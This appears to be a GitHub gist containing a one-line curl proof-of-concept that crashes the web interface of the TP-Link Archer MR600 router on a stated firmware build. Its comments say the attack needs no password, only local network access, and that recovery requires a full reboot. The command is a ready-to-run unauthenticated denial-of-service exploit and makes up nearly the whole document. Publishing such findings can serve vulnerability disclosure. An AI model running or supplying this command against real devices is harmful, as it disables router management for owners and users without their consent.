Last active
October 13, 2024 22:30
-
-
Save GGORG0/c99d1c4f02d2582568d097d254c91bdc to your computer and use it in GitHub Desktop.
Crash TP-Link Archer MR600 WebUI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script crashes the WebUI of the TP-Link Archer MR600 router | |
| # It was tested on firmware version 1.3.0 0.9.1 v0001.0 Build 210608 RC.66100n | |
| # To fix the WebUI a full device reboot is required | |
| # This only needs local network access, no WebUI password knowledge is needed | |
| curl 'http://192.168.1.1/cgi/login' -X POST -H 'Referer: http://192.168.1.1/' -v |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment